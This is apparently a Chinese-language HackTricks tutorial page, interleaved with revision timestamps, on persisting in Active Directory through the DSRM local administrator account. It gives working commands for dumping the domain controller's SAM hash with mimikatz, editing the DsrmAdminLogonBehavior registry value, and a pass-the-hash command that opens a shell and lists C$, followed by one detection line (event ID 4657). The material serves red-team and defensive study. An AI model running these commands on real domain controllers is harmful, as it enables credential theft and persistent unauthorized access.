2022-04-28 16:01:33 +00:00
< details >
2024-02-09 02:09:47 +00:00
< summary > < strong > 从零开始学习AWS黑客技术, 成为< / strong > < a href = "https://training.hacktricks.xyz/courses/arte" > < strong > htARTE( HackTricks AWS红队专家) < / strong > < / a > < strong > ! < / strong > < / summary >
2022-04-28 16:01:33 +00:00
2024-02-09 02:09:47 +00:00
其他支持HackTricks的方式:
2022-04-28 16:01:33 +00:00
2024-02-09 02:09:47 +00:00
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord群** ](https://discord.gg/hRep4RUj7f ) 或 [**电报群** ](https://t.me/peass ) 或 **关注**我们的**Twitter** 🐦 [**@carlospolopm** ](https://twitter.com/hacktricks_live )**。**
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
2022-04-28 16:01:33 +00:00
< / details >
2024-01-12 08:16:22 +00:00
# DSRM凭据
2020-07-15 15:43:14 +00:00
2024-02-09 02:09:47 +00:00
每个**DC**中都有一个**本地管理员**帐户。在此计算机中具有管理员权限后, 您可以使用mimikatz来**转储本地管理员哈希**。然后,修改注册表以**激活此密码**,以便您可以远程访问此本地管理员用户。\
首先,我们需要**转储**DC中**本地管理员**用户的**哈希**:
2020-07-15 15:43:14 +00:00
```bash
Invoke-Mimikatz -Command '"token::elevate" "lsadump::sam"'
```
2024-02-09 02:09:47 +00:00
然后我们需要检查该账户是否有效,如果注册表键具有值"0"或不存在,则需要**将其设置为"2"**:
2020-07-15 15:43:14 +00:00
```bash
Get-ItemProperty "HKLM:\SYSTEM\CURRENTCONTROLSET\CONTROL\LSA" -name DsrmAdminLogonBehavior #Check if the key exists and get the value
New-ItemProperty "HKLM:\SYSTEM\CURRENTCONTROLSET\CONTROL\LSA" -name DsrmAdminLogonBehavior -value 2 -PropertyType DWORD #Create key with value "2" if it doesn't exist
Set-ItemProperty "HKLM:\SYSTEM\CURRENTCONTROLSET\CONTROL\LSA" -name DsrmAdminLogonBehavior -value 2 #Change value to "2"
```
2024-02-09 02:09:47 +00:00
然后,使用 PTH, 您可以**列出 C$ 的内容甚至获取 shell**。请注意,为了在内存中使用该哈希创建一个新的 PowerShell 会话(用于 PTH) , **使用的"域"只是 DC 机器的名称:**
2020-07-15 15:43:14 +00:00
```bash
sekurlsa::pth /domain:dc-host-name /user:Administrator /ntlm:b629ad5753f4c441e3af31c97fad8973 /run:powershell.exe
#And in new spawned powershell you now can access via NTLM the content of C$
ls \\dc-host-name\C$
```
2024-02-09 02:09:47 +00:00
更多信息请查看:[https://adsecurity.org/?p=1714](https://adsecurity.org/?p=1714) 和 [https://adsecurity.org/?p=1785 ](https://adsecurity.org/?p=1785 )
2020-07-15 15:43:14 +00:00
2023-08-03 19:12:22 +00:00
## 缓解措施
2020-07-15 15:43:14 +00:00
2024-02-09 02:09:47 +00:00
* 事件 ID 4657 - 审计 `HKLM:\System\CurrentControlSet\Control\Lsa DsrmAdminLogonBehavior` 的创建/更改
2022-04-28 16:01:33 +00:00
< details >
2024-02-09 02:09:47 +00:00
< summary > < strong > 从零开始学习 AWS 黑客技术,成为专家< / strong > < a href = "https://training.hacktricks.xyz/courses/arte" > < strong > htARTE( HackTricks AWS 红队专家)< / strong > < / a > < strong > ! < / strong > < / summary >
2022-04-28 16:01:33 +00:00
2024-01-12 08:16:22 +00:00
支持 HackTricks 的其他方式:
2022-04-28 16:01:33 +00:00
2024-02-09 02:09:47 +00:00
* 如果您想看到您的**公司在 HackTricks 中做广告**或**下载 PDF 版本的 HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方 PEASS & HackTricks 商品**](https://peass.creator-spring.com)
* 探索[**PEASS 家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFT**](https://opensea.io/collection/the-peass-family)收藏
* **加入** 💬 [**Discord 群组** ](https://discord.gg/hRep4RUj7f ) 或 [**电报群组** ](https://t.me/peass ) 或**关注**我们的**Twitter** 🐦 [**@carlospolopm** ](https://twitter.com/hacktricks_live )**。**
* 通过向 [**HackTricks** ](https://github.com/carlospolop/hacktricks ) 和 [**HackTricks Cloud** ](https://github.com/carlospolop/hacktricks-cloud ) github 仓库提交 PR 来分享您的黑客技巧。
2022-04-28 16:01:33 +00:00
< / details >